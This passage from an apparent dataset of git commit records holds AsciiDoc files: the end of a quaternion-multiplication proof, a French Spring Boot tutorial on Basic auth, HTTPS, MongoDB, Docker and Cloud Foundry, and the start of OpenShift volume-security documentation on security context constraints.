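= np.cross(v1, v2)\nc = n \/ np.linalg.norm(n)\na = rodrigues(c, v1, -0.5 * t1)                # c rotated about v1 by -t1\/2\nb = rodrigues(c, v2, 0.5 * t2)                 # c rotated about v2 by +t2\/2\n\nq1 = np.append(np.sin(0.5 * t1) * v1, np.cos(0.5 * t1))\nq2 = np.append(np.sin(0.5 * t2) * v2, np.cos(0.5 * t2))\nqa = np.append(a, 0.0)\nqb = np.append(b, 0.0)\n\n# The two flips reproduce the combined rotation: q2 q1 == -(qb qa).\nprint(np.allclose(qmul(q2, q1), -qmul(qb, qa)))   # True\n----\n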
\nFrom these, we have\n[stem]\n++++\n\\begin{align*}\n\\vec{a}\u00b7\\vec{b}&=\\frac{1}{{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}}(cos\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2} - sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}((\\vec{v_1}\u00d7(\\vec{v_1}\u00d7\\vec{v_2}))\u00b7(\\vec{v_2}\u00d7(\\vec{v_1}\u00d7\\vec{v_2}))))\\\\\n&=\\frac{1}{{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}}(cos\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2} - sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}(\\vec{v_1}\u00b7\\vec{v_2}){\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2})\\\\\n&=cos\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2} - sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}(\\vec{v_1}\u00b7\\vec{v_2})\n\\end{align*}\n++++ \n[stem]\n++++\n\\begin{align*}\n\\vec{a}\u00d7\\vec{b}&=\\frac{1}{{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}}(cos\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}((\\vec{v_1}\u00d7\\vec{v_2})\u00d7(\\vec{v_2}\u00d7(\\vec{v_1}\u00d7\\vec{v_2})))\\\\\n&- sin\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2}((\\vec{v_1}\u00d7(\\vec{v_1}\u00d7\\vec{v_2}))\u00d7(\\vec{v_1}\u00d7\\vec{v_2}))\\\\\n&- sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}((\\vec{v_1}\u00d7(\\vec{v_1}\u00d7\\vec{v_2}))\u00d7(\\vec{v_2}\u00d7(\\vec{v_1}\u00d7\\vec{v_2}))))\\\\\n&=\\frac{1}{{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}}(cos\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}\\vec{v_2} + sin\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}\\vec{v_1} - sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}{\\left|\\vec{v_1}\u00d7\\vec{v_2}\\right|}^{2}(\\vec{v_1}\u00d7\\vec{v_2}))\\\\\n&=cos\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}\\vec{v_2} + sin\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2}\\vec{v_1} - sin\\frac{\u03b8_1}{2}sin\\frac{\u03b8_2}{2}(\\vec{v_1}\u00d7\\vec{v_2})\n\\end{align*}\n++++ \nFrom the previous proof of rotation composition we know stem:[q={q_2}{q_1}=-{q_b}{q_a}], that is \n[stem]\n++++\n\\begin{align*}\nq&=(\\vec{a}\u00d7\\vec{b},\\vec{a}\u00b7\\vec{b})\\\\\n&=(cos\\frac{\u03b8_1}{2}(sin\\frac{\u03b8_2}{2}\\vec{v_2}) + cos\\frac{\u03b8_2}{2}(sin\\frac{\u03b8_1}{2}\\vec{v_1}) - (sin\\frac{\u03b8_1}{2}\\vec{v_1})\u00d7(sin\\frac{\u03b8_2}{2}\\vec{v_2}), cos\\frac{\u03b8_1}{2}cos\\frac{\u03b8_2}{2} - (sin\\frac{\u03b8_1}{2}\\vec{v_1})\u00b7(sin\\frac{\u03b8_2}{2}\\vec{v_2}))\n\\end{align*}\n++++ \nwhich is exactly the definition of quaternion multiplication applied to stem:[{q_2}{q_1}=(sin\u2061\\frac{\u03b8_2}{2}\\vec{v_2},cos\u2061\\frac{\u03b8_2}{2})(sin\u2061\\frac{\u03b8_1}{2}\\vec{v_1},cos\u2061\\frac{\u03b8_1}{2})], as expected since stem:[q={q_2}{q_1}]; swapping the labels 1 and 2 then gives the general multiplication rule stated at the beginning of this appendix.\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"35b3a90e6822583bafd4e08e96f5933dcb1640e4","subject":"Update DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie-BACK.adoc","message":"Update DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie-BACK.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie-BACK.adoc","new_file":"_posts\/DS_Store-10-raisons-10-raisons-de-se-mettre-a-Spring-Boot-2eme-partie-BACK.adoc","new_contents":"= 10 raisons de se mettre \u00e0 Spring Boot (2\u00e8me partie) - BACK\n:hp-tags: Spring Boot, MongoDB, Cloud Foundry\n\n====\nLa premi\u00e8re partie de cet article est disponible 
http:\/\/blog.ellixo.com\/2015\/06\/08\/10-raisons-de-se-mettre-a-Spring-Boot-1ere-partie.html[ici]\n====\n\n6 - La s\u00e9curit\u00e9 pour les nuls\n=============================\n\nLa mise en oeuvre de m\u00e9canisme de s\u00e9curit\u00e9 est primordial ; pour autant, il s'agit toujours d'une \u00e9tape fastidieuse que l'on a tendance \u00e0 repousser. Spring Boot (encore une fois) nous simplifie la t\u00e2che. \n\nPrenons la mise en oeuvre d'une politique de s\u00e9curit\u00e9 simple et classique mais relativement performante : Authentication Basic + HTTPS.\n\n- 1\u00e8re \u00e9tape : HTTP Basic authentication\n\nCe mode d'authentification n\u00e9cessite de fournir lors de l'appel d'une URL un nom d'utilisateur accompagn\u00e9 de son mot de passe. Dans Spring Boot, pour mettre en oeuvre ce m\u00e9canisme, il suffit de :\n\n[circle]\n* ajouter la d\u00e9pendance _org.springframework.boot.spring-boot-starter-security_ au fichier POM\n* ajouter la propri\u00e9t\u00e9 security.user.password sp\u00e9cifiant le mot de passe de l'utilisateur par d\u00e9faut (ie. _user_)\n\nD\u00e8s lors, tout appel aux URL de l'application n\u00e9cessite une authentification :\n\n[source,bash]\n----\n~$ curl http:\/\/localhost:9292\/api\n{\"timestamp\":1432745548802,\"status\":401,\"error\":\"Unauthorized\",\"message\":\"Full authentication is required to access this resource\",\"path\":\"\/api\"}\n\n~$ curl http:\/\/user:bad_password@localhost:9292\/api\n{\"timestamp\":1432745622513,\"status\":401,\"error\":\"Unauthorized\",\"message\":\"Bad credentials\",\"path\":\"\/api\"}\n\n~$ curl http:\/\/user:password@localhost:9292\/api\n{\"status\":\"OK\",\"timestamp\":\"1432745645639\"}\n----\n\n* 2\u00e8me \u00e9tape : HTTPS\n\nL'authentification _Basic_ poss\u00e8de un d\u00e9faut majeur : elle n\u00e9cessite de faire transiter le mot de passe en clair. Pallions cela en cryptant les communications via HTTPS. Encore une fois, Spring Boot a tout pr\u00e9vu :\n\n[circle]\n* Ajout d'un repository de certificats (ie. fichier https:\/\/docs.oracle.com\/cd\/E19509-01\/820-3503\/ggfen\/index.html[.jks]) dans l'arborescence de l'application\n* Configuration des propri\u00e9t\u00e9s du repository\n\n[source,yaml]\n----\nserver:\n port: 9292\n ssl:\n key-store: classpath:keystore.jks\n key-store-password: password\n key-password: password\nsecurity:\n user:\n password: password\n----\n\nHTTPS est maintenant disponible ; voil\u00e0 votre application s\u00e9curis\u00e9e en 5 minutes.\n\n7 - La bo\u00eete \u00e0 outils du parfait petit int\u00e9grateur\n==================================================\n\nLes d\u00e9mos ou tutoriaux que vous pourrez trouver sur le web fournissent la plupart du temps une API REST simple (cf. point 1). Bien s\u00fbr, Spring Boot va beaucoup plus loin en fournissant de nombreux connecteurs :\n\n* Bases relationnelles : JDBC, JPA, JdbcTemplate\n* Bases NoSQL : Redis, MongoDB, ElasticSearch ...\n* Messaging : JMS\n\nIl est bien s\u00fbr possible d'int\u00e9grer n'importe quelle librairie externe mais les connecteurs \"Spring Boot\" simplifieront la mise en oeuvre et la configuration des syst\u00e8mes au sein de l'application.\n\nNous allons faire \u00e9voluer notre application pour stocker les logs dans une base MongoDB.\n\n. 
Pour \u00e9viter d'installer MongoDB et simplifier les tests de l'application, nous allons utiliser une instance embarqu\u00e9e \u00e0 l'aide de la librairie https:\/\/github.com\/flapdoodle-oss\/de.flapdoodle.embed.mongo[Mongo Embed Flapdoodle] (remarque : nous associons cette base embarqu\u00e9e au profil \"test\" pour \u00e9viter son ex\u00e9cution sur un autre profil, production par exemple) :\n\n[source,java]\n----\n@Component\n@Profile(\"test\")\npublic class MongoDBEmbed {\n\n private MongodExecutable mongodExecutable;\n\n @PostConstruct\n public void start() {\n MongodStarter starter = MongodStarter.getDefaultInstance();\n\n try {\n IMongodConfig mongodConfig = new MongodConfigBuilder()\n .version(Version.Main.PRODUCTION)\n .net(new Net(27017,false))\n .build();\n mongodExecutable = starter.prepare(mongodConfig);\n mongodExecutable.start();\n } catch (Exception e) {\n e.printStackTrace();\n }\n }\n\n @PreDestroy\n public void stop() {\n if (mongodExecutable != null) {\n mongodExecutable.stop();\n }\n }\n\n}\n----\n\t\n[start=2]\n. Nous mettons \u00e0 jour notre service REST en injectant une factory MongoDB et en sauvegardant l'ensemble des r\u00e9ponses API. Nous en profitons \u00e9galement pour ajouter une nouvelle op\u00e9ration renvoyant l'ensemble des logs pour tester la sauvegarde :\n\n[source,java]\n----\n@RestController\n@RequestMapping(\"\/api\")\npublic class RestServices {\n\n @Autowired\n private MongoDbFactory mongo;\n\n @RequestMapping(method = RequestMethod.GET)\n public\n @ResponseBody\n String ping() {\n String status = \"{\\\"status\\\":\\\"OK\\\",\\\"timestamp\\\":\\\"\" + System.currentTimeMillis() + \"\\\"}\";\n\n DBObject dbObject = (DBObject) JSON.parse(status);\n mongo.getDb().getCollection(\"logs\").insert(dbObject);\n\n return status;\n }\n\n @RequestMapping(value = \"logs\", method = RequestMethod.GET)\n public\n @ResponseBody\n String logs() {\n DBCursor cursor = mongo.getDb().getCollection(\"logs\").find();\n\n StringBuilder sb = new StringBuilder();\n while (cursor.hasNext()) {\n sb.append(cursor.next());\n }\n\n return sb.toString();\n }\n\n}\n----\n\n[start=3]\n. Il n'y a plus qu'\u00e0 tester :\n\n[source,bash]\n----\n~$ curl -k https:\/\/user:password@localhost:9292\/api\n{\"status\":\"OK\",\"timestamp\":\"1432759655293\"}\n~$ curl -k https:\/\/user:password@localhost:9292\/api\n{\"status\":\"OK\",\"timestamp\":\"1432759658078\"}\n~$curl -k https:\/\/user:password@localhost:9292\/api\/logs\n{ \"_id\" : { \"$oid\" : \"55662d67e026541721386250\"} , \"status\" : \"OK\" , \"timestamp\" : \"1432759655293\"}{ \"_id\" : { \"$oid\" : \"55662d6ae026541721386251\"} , \"status\" : \"OK\" , \"timestamp\" : \"1432759658078\"}\n----\n\n8 - Spring Boot et Docker...tout simple (\u00e9videmment)\n====================================================\n\nOn l'a vu plus t\u00f4t, la m\u00e9thode privil\u00e9gi\u00e9e de d\u00e9ploiement consiste en un jar ex\u00e9cutable. Cela nous simplifie \u00e9galement la t\u00e2che pour \"dockeriser\" notre application. Le DockerFile correspondant est tout simple (oui encore !) 
:\n\n[source,dockerfile]\n----\nFROM java:8u45\nMAINTAINER Gregory Le Bonniec \"gregory.le.bonniec@ellixo.com\"\n\nADD springboot-1.0-SNAPSHOT.jar app.jar\n\nENTRYPOINT [ \"java\", \"-Dspring.profiles.active=test\", \"-jar\", \"\/app.jar\" ]\n----\n\nExplications : Le jar est ajout\u00e9 au DockerFile puis ex\u00e9cut\u00e9 en positionnant le profil de test comme le profil actif.\n\nEnfin il nous reste \u00e0 construire l'image puis \u00e0 l'ex\u00e9cuter (et \u00e0 tester) :\n\n[source,bash]\n----\n~$ docker build -t ellixo\/springboot .\n~$ docker run -d -p=9292:9292 ellixo\/springboot\n----\n\n9 - Vous pouvez m\u00eame le mettre en production\n============================================\n\nOn l'a vu dans les pr\u00e9c\u00e9dents points, SpringBoot simplifie grandement la mise en production de votre application : s\u00e9curit\u00e9, \"dockerisation\", d\u00e9ploiement ... \n\nPour aller plus loin, il est possible d'installer le module Actuator qui fournit de nombreuses fonctionnalit\u00e9s d'administation syst\u00e8me (via notamment une API Rest) :\n\n* health : fournit des donn\u00e9es permettant de v\u00e9rifier l'\u00e9tat de l'application (UP\/DOWN, \u00e9tat disque, \u00e9tat syst\u00e8mes externes ...)\n* metrics : fournit des m\u00e9triques processus (threads, CPU, m\u00e9moire ...)\n* trace : fournit les informations des derni\u00e8res connexions HTTP applicatives ...\n\nLibre \u00e0 vous ensuite de connecter ce module \u00e0 l'outil de monitoring du syst\u00e8me d'information (Graphite, Promotheus ...)\n\n[source,bash]\nExemple : API Health\n----\n~$ curl http:\/\/user:password@localhost:9292\/health\n{\"status\":\"UP\",\"diskSpace\":{\"status\":\"UP\",\"free\":169718296576,\"threshold\":10485760},\"mongo\":{\"status\":\"UP\",\"version\":\"3.0.2\"}}\n----\n\n10 - Mon client veut du Cloud...pas de soucis\n=============================================\n\nEncore une fois, le fait qu'une application Spring Boot embarque son propre containeur (Tomcat ou Jetty par d\u00e9faut donc) simplifie un d\u00e9ploiement cloud.\n\nPour d\u00e9montrer le rapidit\u00e9 du processus, j'ai d\u00e9cid\u00e9 d'exposer le d\u00e9ploiement sous la plateforme Cloud Foundry de Pivotal (\u00e0 tout seigneur, tout honneur) :\n\n* Une fois votre compte Pivotal Web Services cr\u00e9\u00e9 et le client associ\u00e9 install\u00e9, la seule commande \u00e0 ex\u00e9cuter sur votre environnement est :\n\n[source,bash]\n----\n~$ cf push springboot-demo -p springboot-1.0-SNAPSHOT.jar\n...\nUploading app files from: springboot-1.0-SNAPSHOT.jar\nUploading 623.8K, 96 files\nDone uploading\nOK\n----\n\t\n* Par d\u00e9faut, Cloud Foundry prend en compte le profil \"cloud\" ; pour autant, il est possible d'activer un autre profil en positionnant la variable d'environnement JAVA_OPTS (exemple : -Dspring.profiles.active=test)\n\n* L'application est alors disponible via l'URL _nom_app.cfapps.io_ (\\http:\/\/springboot-demo.cfapps.io ici)\n\n====\nLes sources des exemples sont disponibles sur le https:\/\/github.com\/Ellixo\/springboot-demo[Repository GitHub Ellixo]\n====","old_contents":"= 10 raisons de se mettre \u00e0 Spring Boot (2\u00e8me partie)\n:hp-tags: Spring Boot, MongoDB, Cloud Foundry\n\n====\nLa premi\u00e8re partie de cet article est disponible http:\/\/blog.ellixo.com\/2015\/06\/08\/10-raisons-de-se-mettre-a-Spring-Boot-1ere-partie.html[ici]\n====\n\n6 - La s\u00e9curit\u00e9 pour les nuls\n=============================\n\nLa mise en oeuvre de m\u00e9canisme de s\u00e9curit\u00e9 est primordial ; pour 
autant, il s'agit toujours d'une \u00e9tape fastidieuse que l'on a tendance \u00e0 repousser. Spring Boot (encore une fois) nous simplifie la t\u00e2che. \n\nPrenons la mise en oeuvre d'une politique de s\u00e9curit\u00e9 simple et classique mais relativement performante : Authentication Basic + HTTPS.\n\n- 1\u00e8re \u00e9tape : HTTP Basic authentication\n\nCe mode d'authentification n\u00e9cessite de fournir lors de l'appel d'une URL un nom d'utilisateur accompagn\u00e9 de son mot de passe. Dans Spring Boot, pour mettre en oeuvre ce m\u00e9canisme, il suffit de :\n\n[circle]\n* ajouter la d\u00e9pendance _org.springframework.boot.spring-boot-starter-security_ au fichier POM\n* ajouter la propri\u00e9t\u00e9 security.user.password sp\u00e9cifiant le mot de passe de l'utilisateur par d\u00e9faut (ie. _user_)\n\nD\u00e8s lors, tout appel aux URL de l'application n\u00e9cessite une authentification :\n\n[source,bash]\n----\n~$ curl http:\/\/localhost:9292\/api\n{\"timestamp\":1432745548802,\"status\":401,\"error\":\"Unauthorized\",\"message\":\"Full authentication is required to access this resource\",\"path\":\"\/api\"}\n\n~$ curl http:\/\/user:bad_password@localhost:9292\/api\n{\"timestamp\":1432745622513,\"status\":401,\"error\":\"Unauthorized\",\"message\":\"Bad credentials\",\"path\":\"\/api\"}\n\n~$ curl http:\/\/user:password@localhost:9292\/api\n{\"status\":\"OK\",\"timestamp\":\"1432745645639\"}\n----\n\n* 2\u00e8me \u00e9tape : HTTPS\n\nL'authentification _Basic_ poss\u00e8de un d\u00e9faut majeur : elle n\u00e9cessite de faire transiter le mot de passe en clair. Pallions cela en cryptant les communications via HTTPS. Encore une fois, Spring Boot a tout pr\u00e9vu :\n\n[circle]\n* Ajout d'un repository de certificats (ie. fichier https:\/\/docs.oracle.com\/cd\/E19509-01\/820-3503\/ggfen\/index.html[.jks]) dans l'arborescence de l'application\n* Configuration des propri\u00e9t\u00e9s du repository\n\n[source,yaml]\n----\nserver:\n port: 9292\n ssl:\n key-store: classpath:keystore.jks\n key-store-password: password\n key-password: password\nsecurity:\n user:\n password: password\n----\n\nHTTPS est maintenant disponible ; voil\u00e0 votre application s\u00e9curis\u00e9e en 5 minutes.\n\n7 - La bo\u00eete \u00e0 outils du parfait petit int\u00e9grateur\n==================================================\n\nLes d\u00e9mos ou tutoriaux que vous pourrez trouver sur le web fournissent la plupart du temps une API REST simple (cf. point 1). Bien s\u00fbr, Spring Boot va beaucoup plus loin en fournissant de nombreux connecteurs :\n\n* Bases relationnelles : JDBC, JPA, JdbcTemplate\n* Bases NoSQL : Redis, MongoDB, ElasticSearch ...\n* Messaging : JMS\n\nIl est bien s\u00fbr possible d'int\u00e9grer n'importe quelle librairie externe mais les connecteurs \"Spring Boot\" simplifieront la mise en oeuvre et la configuration des syst\u00e8mes au sein de l'application.\n\nNous allons faire \u00e9voluer notre application pour stocker les logs dans une base MongoDB.\n\n. 
Pour \u00e9viter d'installer MongoDB et simplifier les tests de l'application, nous allons utiliser une instance embarqu\u00e9e \u00e0 l'aide de la librairie https:\/\/github.com\/flapdoodle-oss\/de.flapdoodle.embed.mongo[Mongo Embed Flapdoodle] (remarque : nous associons cette base embarqu\u00e9e au profil \"test\" pour \u00e9viter son ex\u00e9cution sur un autre profil, production par exemple) :\n\n[source,java]\n----\n@Component\n@Profile(\"test\")\npublic class MongoDBEmbed {\n\n private MongodExecutable mongodExecutable;\n\n @PostConstruct\n public void start() {\n MongodStarter starter = MongodStarter.getDefaultInstance();\n\n try {\n IMongodConfig mongodConfig = new MongodConfigBuilder()\n .version(Version.Main.PRODUCTION)\n .net(new Net(27017,false))\n .build();\n mongodExecutable = starter.prepare(mongodConfig);\n mongodExecutable.start();\n } catch (Exception e) {\n e.printStackTrace();\n }\n }\n\n @PreDestroy\n public void stop() {\n if (mongodExecutable != null) {\n mongodExecutable.stop();\n }\n }\n\n}\n----\n\t\n[start=2]\n. Nous mettons \u00e0 jour notre service REST en injectant une factory MongoDB et en sauvegardant l'ensemble des r\u00e9ponses API. Nous en profitons \u00e9galement pour ajouter une nouvelle op\u00e9ration renvoyant l'ensemble des logs pour tester la sauvegarde :\n\n[source,java]\n----\n@RestController\n@RequestMapping(\"\/api\")\npublic class RestServices {\n\n @Autowired\n private MongoDbFactory mongo;\n\n @RequestMapping(method = RequestMethod.GET)\n public\n @ResponseBody\n String ping() {\n String status = \"{\\\"status\\\":\\\"OK\\\",\\\"timestamp\\\":\\\"\" + System.currentTimeMillis() + \"\\\"}\";\n\n DBObject dbObject = (DBObject) JSON.parse(status);\n mongo.getDb().getCollection(\"logs\").insert(dbObject);\n\n return status;\n }\n\n @RequestMapping(value = \"logs\", method = RequestMethod.GET)\n public\n @ResponseBody\n String logs() {\n DBCursor cursor = mongo.getDb().getCollection(\"logs\").find();\n\n StringBuilder sb = new StringBuilder();\n while (cursor.hasNext()) {\n sb.append(cursor.next());\n }\n\n return sb.toString();\n }\n\n}\n----\n\n[start=3]\n. Il n'y a plus qu'\u00e0 tester :\n\n[source,bash]\n----\n~$ curl -k https:\/\/user:password@localhost:9292\/api\n{\"status\":\"OK\",\"timestamp\":\"1432759655293\"}\n~$ curl -k https:\/\/user:password@localhost:9292\/api\n{\"status\":\"OK\",\"timestamp\":\"1432759658078\"}\n~$curl -k https:\/\/user:password@localhost:9292\/api\/logs\n{ \"_id\" : { \"$oid\" : \"55662d67e026541721386250\"} , \"status\" : \"OK\" , \"timestamp\" : \"1432759655293\"}{ \"_id\" : { \"$oid\" : \"55662d6ae026541721386251\"} , \"status\" : \"OK\" , \"timestamp\" : \"1432759658078\"}\n----\n\n8 - Spring Boot et Docker...tout simple (\u00e9videmment)\n====================================================\n\nOn l'a vu plus t\u00f4t, la m\u00e9thode privil\u00e9gi\u00e9e de d\u00e9ploiement consiste en un jar ex\u00e9cutable. Cela nous simplifie \u00e9galement la t\u00e2che pour \"dockeriser\" notre application. Le DockerFile correspondant est tout simple (oui encore !) 
:\n\n[source,dockerfile]\n----\nFROM java:8u45\nMAINTAINER Gregory Le Bonniec \"gregory.le.bonniec@ellixo.com\"\n\nADD springboot-1.0-SNAPSHOT.jar app.jar\n\nENTRYPOINT [ \"java\", \"-Dspring.profiles.active=test\", \"-jar\", \"\/app.jar\" ]\n----\n\nExplications : Le jar est ajout\u00e9 au DockerFile puis ex\u00e9cut\u00e9 en positionnant le profil de test comme le profil actif.\n\nEnfin il nous reste \u00e0 construire l'image puis \u00e0 l'ex\u00e9cuter (et \u00e0 tester) :\n\n[source,bash]\n----\n~$ docker build -t ellixo\/springboot .\n~$ docker run -d -p=9292:9292 ellixo\/springboot\n----\n\n9 - Vous pouvez m\u00eame le mettre en production\n============================================\n\nOn l'a vu dans les pr\u00e9c\u00e9dents points, SpringBoot simplifie grandement la mise en production de votre application : s\u00e9curit\u00e9, \"dockerisation\", d\u00e9ploiement ... \n\nPour aller plus loin, il est possible d'installer le module Actuator qui fournit de nombreuses fonctionnalit\u00e9s d'administation syst\u00e8me (via notamment une API Rest) :\n\n* health : fournit des donn\u00e9es permettant de v\u00e9rifier l'\u00e9tat de l'application (UP\/DOWN, \u00e9tat disque, \u00e9tat syst\u00e8mes externes ...)\n* metrics : fournit des m\u00e9triques processus (threads, CPU, m\u00e9moire ...)\n* trace : fournit les informations des derni\u00e8res connexions HTTP applicatives ...\n\nLibre \u00e0 vous ensuite de connecter ce module \u00e0 l'outil de monitoring du syst\u00e8me d'information (Graphite, Promotheus ...)\n\n[source,bash]\nExemple : API Health\n----\n~$ curl http:\/\/user:password@localhost:9292\/health\n{\"status\":\"UP\",\"diskSpace\":{\"status\":\"UP\",\"free\":169718296576,\"threshold\":10485760},\"mongo\":{\"status\":\"UP\",\"version\":\"3.0.2\"}}\n----\n\n10 - Mon client veut du Cloud...pas de soucis\n=============================================\n\nEncore une fois, le fait qu'une application Spring Boot embarque son propre containeur (Tomcat ou Jetty par d\u00e9faut donc) simplifie un d\u00e9ploiement cloud.\n\nPour d\u00e9montrer le rapidit\u00e9 du processus, j'ai d\u00e9cid\u00e9 d'exposer le d\u00e9ploiement sous la plateforme Cloud Foundry de Pivotal (\u00e0 tout seigneur, tout honneur) :\n\n* Une fois votre compte Pivotal Web Services cr\u00e9\u00e9 et le client associ\u00e9 install\u00e9, la seule commande \u00e0 ex\u00e9cuter sur votre environnement est :\n\n[source,bash]\n----\n~$ cf push springboot-demo -p springboot-1.0-SNAPSHOT.jar\n...\nUploading app files from: springboot-1.0-SNAPSHOT.jar\nUploading 623.8K, 96 files\nDone uploading\nOK\n----\n\t\n* Par d\u00e9faut, Cloud Foundry prend en compte le profil \"cloud\" ; pour autant, il est possible d'activer un autre profil en positionnant la variable d'environnement JAVA_OPTS (exemple : -Dspring.profiles.active=test)\n\n* L'application est alors disponible via l'URL _nom_app.cfapps.io_ (\\http:\/\/springboot-demo.cfapps.io ici)\n\n====\nLes sources des exemples sont disponibles sur le https:\/\/github.com\/Ellixo\/springboot-demo[Repository GitHub Ellixo]\n====","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"209be6d28ec79a35599c76763451ef2ad0bb78e5","subject":"remove nfsnobody from examples and text","message":"remove nfsnobody from examples and 
text\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"install_config\/persistent_storage\/pod_security_context.adoc","new_file":"install_config\/persistent_storage\/pod_security_context.adoc","new_contents":"[[install-config-persistent-storage-pod-security-context]]\n= Volume Security\n{product-author}\n{product-version}\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n:prewrap!:\n\ntoc::[]\n\n== Overview\n\nThis topic provides a general guide on pod security as it relates to volume\nsecurity. For information on pod-level security in general, see\nxref:..\/..\/admin_guide\/manage_scc.adoc#admin-guide-manage-scc[Managing Security Context Constraints\n(SCC)] and the\nxref:..\/..\/architecture\/additional_concepts\/authorization.adoc#security-context-constraints[Security\nContext Constraint] concept topic. For information on the {product-title}\npersistent volume (PV) framework in general, see the\nxref:..\/..\/architecture\/additional_concepts\/storage.adoc#architecture-additional-concepts-storage[Persistent Storage]\nconcept topic.\n\nAccessing persistent storage requires coordination between the cluster and\/or\nstorage administrator and the end developer. The cluster administrator creates\nPVs, which abstract the underlying physical storage. The developer creates pods\nand, optionally, PVCs, which bind to PVs, based on matching criteria, such as\ncapacity.\n\nMultiple persistent volume claims (PVCs) within the same project can bind to the\nsame PV. However, once a PVC binds to a PV, that PV cannot be bound by a claim\noutside of the first claim's project. If the underlying storage needs to be\naccessed by multiple projects, then each project needs its own PV, which can\npoint to the same physical storage. In this sense, a bound PV is tied to a\nproject. For a detailed PV and PVC example, see the guide for\nhttps:\/\/github.com\/openshift\/origin\/tree\/master\/examples\/wordpress[WordPress and\nMySQL using NFS].\n\nFor the cluster administrator, granting pods access to PVs involves:\n\n- knowing the group ID and\/or user ID assigned to the actual storage,\n- understanding SELinux considerations, and\n- ensuring that these IDs are allowed in the range of legal IDs defined for the\nproject and\/or the SCC that matches the requirements of the pod.\n\nGroup IDs, the user ID, and SELinux values are defined in the\n`*SecurityContext*` section in a pod definition. Group IDs are global to the pod\nand apply to all containers defined in the pod. User IDs can also be global, or\nspecific to each container. Four sections control access to volumes:\n\n- xref:supplemental-groups[`*supplementalGroups*`]\n- xref:fsgroup[`*fsGroup*`]\n- xref:user-id[`*runAsUser*`]\n- xref:selinuxoptions[`*seLinuxOptions*`]\n\n[[sccs-defaults-allowed-ranges]]\n== SCCs, Defaults, and Allowed Ranges\n\nSCCs influence whether or not a pod is given a default user ID, `*fsGroup*` ID,\nsupplemental group ID, and SELinux label. They also influence whether or not IDs\nsupplied in the pod definition (or in the image) will be validated against a\nrange of allowable IDs. If validation is required and fails, then the pod will\nalso fail.\n\nSCCs define strategies, such as `*runAsUser*`, `*supplementalGroups*`, and\n`*fsGroup*`. These strategies help decide whether the pod is authorized.\nStrategy values set to *RunAsAny* are essentially stating that the pod can do\nwhat it wants regarding that strategy. 
Authorization is skipped for that\nstrategy and no {product-title} default is produced based on that strategy.\nTherefore, IDs and SELinux labels in the resulting container are based on\ncontainer defaults instead of {product-title} policies.\n\nFor a quick summary of *RunAsAny*:\n\n- Any ID defined in the pod definition (or image) is allowed.\n- Absence of an ID in the pod definition (and in the image) results in the\ncontainer assigning an ID, which is *root* (0) for Docker.\n- No SELinux labels are defined, so Docker will assign a unique label.\n\nFor these reasons, SCCs with *RunAsAny* for ID-related strategies should be\nprotected so that ordinary developers do not have access to the SCC. On the\nother hand, SCC strategies set to *MustRunAs* or *MustRunAsRange* trigger ID\nvalidation (for ID-related strategies), and cause default values to be supplied\nby {product-title} to the container when those values are not supplied directly\nin the pod definition or image.\n\nSCCs may define the range of allowed IDs (user or groups). If range checking is\nrequired (for example, using *MustRunAs*) and the allowable range is not defined\nin the SCC, then the project determines the ID range. Therefore, projects\nsupport ranges of allowable IDs. However, unlike SCCs, projects do not define\nstrategies, such as `*runAsUser*`.\n\nAllowable ranges are helpful not only because they define the boundaries for\ncontainer IDs, but also because the minimum value in the range becomes the\ndefault value for the ID in question. For example, if the SCC ID strategy value\nis *MustRunAs*, the minimum value of an ID range is *100*, and the ID is absent\nfrom the pod definition, then 100 is provided as the default for this ID.\n\nAs part of pod admission, the SCCs available to a pod are examined (roughly, in\npriority order followed by most restrictive) to best match the requests of the\npod. Setting an SCC's strategy type to *RunAsAny* is less restrictive, whereas a\ntype of *MustRunAs* is more restrictive. All of these strategies are evaluated.\nTo see which SCC was assigned to a pod, use the `oc get pod` command:\n\n====\n----\n# oc get pod <pod_name> -o yaml\n...\nmetadata:\n annotations:\n openshift.io\/scc: nfs-scc <1>\n name: nfs-pod1 <2>\n namespace: default <3>\n...\n----\n<1> Name of the SCC that the pod used (in this case, a custom SCC).\n<2> Name of the pod.\n<3> Name of the project. \"Namespace\" is interchangeable with \"project\" in\n{product-title}. See\nxref:..\/..\/architecture\/core_concepts\/projects_and_users.adoc#namespaces[Projects\nand Users] for details.\n====\n\nIt may not be immediately obvious which SCC was matched by a pod, so the command\nabove can be very useful in understanding the UID, supplemental groups, and\nSELinux relabeling in a live container.\n\nAny SCC with a strategy set to *RunAsAny* allows specific values for 